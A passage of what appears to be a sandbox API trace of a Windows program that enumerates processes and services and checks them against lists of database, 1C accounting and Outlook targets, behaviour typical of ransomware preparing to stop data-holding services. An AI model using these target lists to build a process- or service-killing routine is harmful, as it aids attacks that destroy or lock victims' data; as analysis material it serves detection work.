pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0055.033] lstrlenW (lpString="conhost.exe") returned 11 [0055.033] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa84, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0055.034] lstrlenW (lpString="vssadmin.exe") returned 12 [0055.034] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0055.034] lstrlenW (lpString="VSSVC.exe") returned 9 [0055.034] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.035] lstrlenW (lpString="svchost.exe") returned 11 [0055.035] Process32NextW (in: hSnapshot=0x208, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0055.036] CloseHandle (hObject=0x208) returned 1 [0055.036] Sleep (dwMilliseconds=0x1f4) [0056.325] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x37208d0 [0056.326] EnumServicesStatusExW (in: hSCManager=0x37208d0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 0 [0056.326] GetLastError () returned 0xea [0056.326] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12c6) returned 0x6e39b0 [0056.326] EnumServicesStatusExW (in: hSCManager=0x37208d0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6e39b0, cbBufSize=0x12c6, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6e39b0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 1 [0056.327] CloseServiceHandle (hSCObject=0x37208d0) returned 1 [0056.327] lstrlenW (lpString="Appinfo") returned 7 [0056.327] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0056.327] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0056.327] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0056.327] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0056.327] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0056.327] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0056.327] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0056.327] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0056.327] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0056.327] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0056.328] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0056.328] lstrlenW (lpString="AudioSrv") returned 8 [0056.328] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0056.328] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0056.328] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0056.328] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0056.328] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0056.328] lstrlenW (lpString="BFE") returned 3 [0056.328] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0056.328] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0056.328] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0056.328] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0056.328] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0056.328] lstrlenW (lpString="CryptSvc") returned 8 [0056.328] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0056.328] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0056.328] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0056.328] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0056.328] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0056.328] lstrlenW (lpString="CscService") returned 10 [0056.328] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0056.328] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0056.328] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0056.328] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0056.328] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0056.328] lstrlenW (lpString="DcomLaunch") returned 10 [0056.328] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0056.328] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0056.328] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0056.328] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0056.328] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0056.328] lstrlenW (lpString="Dhcp") returned 4 [0056.328] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0056.329] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0056.329] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0056.329] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0056.329] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0056.329] lstrlenW (lpString="Dnscache") returned 8 [0056.329] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0056.329] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0056.329] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0056.329] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0056.329] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0056.329] lstrlenW (lpString="DPS") returned 3 [0056.329] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0056.329] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0056.329] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0056.329] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0056.329] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0056.329] lstrlenW (lpString="eventlog") returned 8 [0056.329] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0056.329] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0056.329] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0056.329] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0056.329] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0056.329] lstrlenW (lpString="EventSystem") returned 11 [0056.329] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0056.329] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0056.329] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0056.329] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0056.329] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0056.329] lstrlenW (lpString="gpsvc") returned 5 [0056.329] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0056.329] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0056.329] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0056.329] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0056.330] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0056.330] lstrlenW (lpString="iphlpsvc") returned 8 [0056.330] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0056.330] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0056.330] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0056.330] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0056.330] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0056.330] lstrlenW (lpString="LanmanServer") returned 12 [0056.330] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0056.330] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0056.330] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0056.330] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0056.330] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0056.330] lstrlenW (lpString="LanmanWorkstation") returned 17 [0056.330] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0056.330] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0056.330] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0056.330] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0056.330] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0056.330] lstrlenW (lpString="lmhosts") returned 7 [0056.330] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0056.330] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0056.330] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0056.330] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0056.330] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0056.330] lstrlenW (lpString="MMCSS") returned 5 [0056.330] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0056.330] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0056.330] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0056.330] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0056.330] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0056.330] lstrlenW (lpString="MpsSvc") returned 6 [0056.330] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0056.331] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0056.331] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0056.331] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0056.331] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0056.331] lstrlenW (lpString="Netman") returned 6 [0056.331] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0056.331] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0056.331] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0056.331] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0056.331] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0056.331] lstrlenW (lpString="netprofm") returned 8 [0056.331] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0056.331] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0056.331] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0056.331] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0056.331] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0056.331] lstrlenW (lpString="NlaSvc") returned 6 [0056.331] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0056.331] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0056.331] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0056.331] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0056.331] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0056.331] lstrlenW (lpString="nsi") returned 3 [0056.331] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0056.331] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0056.331] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0056.331] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0056.331] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0056.331] lstrlenW (lpString="PcaSvc") returned 6 [0056.331] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0056.331] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0056.331] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0056.331] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0056.332] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0056.332] lstrlenW (lpString="PlugPlay") returned 8 [0056.332] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0056.332] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0056.332] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0056.332] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0056.332] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0056.332] lstrlenW (lpString="Power") returned 5 [0056.332] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0056.332] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0056.332] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0056.332] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0056.332] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0056.332] lstrlenW (lpString="ProfSvc") returned 7 [0056.332] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0056.332] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0056.332] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0056.332] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0056.332] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0056.332] lstrlenW (lpString="RpcEptMapper") returned 12 [0056.332] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0056.332] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0056.332] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0056.332] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0056.332] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0056.332] lstrlenW (lpString="RpcSs") returned 5 [0056.332] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0056.332] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0056.332] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0056.332] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0056.332] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0056.332] lstrlenW (lpString="SamSs") returned 5 [0056.332] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0056.333] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0056.333] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0056.333] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0056.333] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0056.333] lstrlenW (lpString="Schedule") returned 8 [0056.333] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0056.333] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0056.333] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0056.333] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0056.333] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0056.333] lstrlenW (lpString="SENS") returned 4 [0056.333] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0056.333] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0056.333] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0056.333] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0056.333] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0056.333] lstrlenW (lpString="ShellHWDetection") returned 16 [0056.333] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0056.333] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0056.333] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0056.333] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0056.333] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0056.333] lstrlenW (lpString="Spooler") returned 7 [0056.333] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0056.333] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0056.333] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0056.333] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0056.333] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0056.333] lstrlenW (lpString="swprv") returned 5 [0056.333] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0056.333] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0056.333] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0056.333] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0056.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0056.334] lstrlenW (lpString="SysMain") returned 7 [0056.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0056.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0056.334] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0056.334] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0056.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0056.334] lstrlenW (lpString="Themes") returned 6 [0056.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0056.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0056.334] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0056.334] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0056.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0056.334] lstrlenW (lpString="TrkWks") returned 6 [0056.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0056.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0056.334] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0056.334] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0056.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0056.334] lstrlenW (lpString="UxSms") returned 5 [0056.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0056.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0056.334] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0056.334] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0056.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0056.334] lstrlenW (lpString="VSS") returned 3 [0056.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0056.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0056.334] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0056.334] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0056.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0056.334] lstrlenW (lpString="WdiServiceHost") returned 14 [0056.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0056.335] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0056.335] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0056.335] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0056.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0056.335] lstrlenW (lpString="WdiSystemHost") returned 13 [0056.335] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0056.335] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0056.335] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0056.335] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0056.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0056.335] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0056.335] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0056.335] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0056.335] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0056.335] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0056.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0056.335] lstrlenW (lpString="Winmgmt") returned 7 [0056.335] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0056.335] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0056.335] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0056.335] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0056.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0056.335] lstrlenW (lpString="WPDBusEnum") returned 10 [0056.335] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0056.335] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0056.335] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0056.335] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0056.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0056.335] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6e39b0 | out: hHeap=0x5f0000) returned 1 [0056.335] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240 [0056.338] Process32FirstW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0056.338] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0056.339] lstrlenW (lpString="System") returned 6 [0056.339] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0056.339] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0056.339] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0056.339] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0056.339] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0056.339] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0056.339] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0056.339] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0056.340] lstrlenW (lpString="smss.exe") returned 8 [0056.340] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0056.340] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0056.340] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0056.340] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0056.340] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0056.340] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0056.340] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0056.340] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 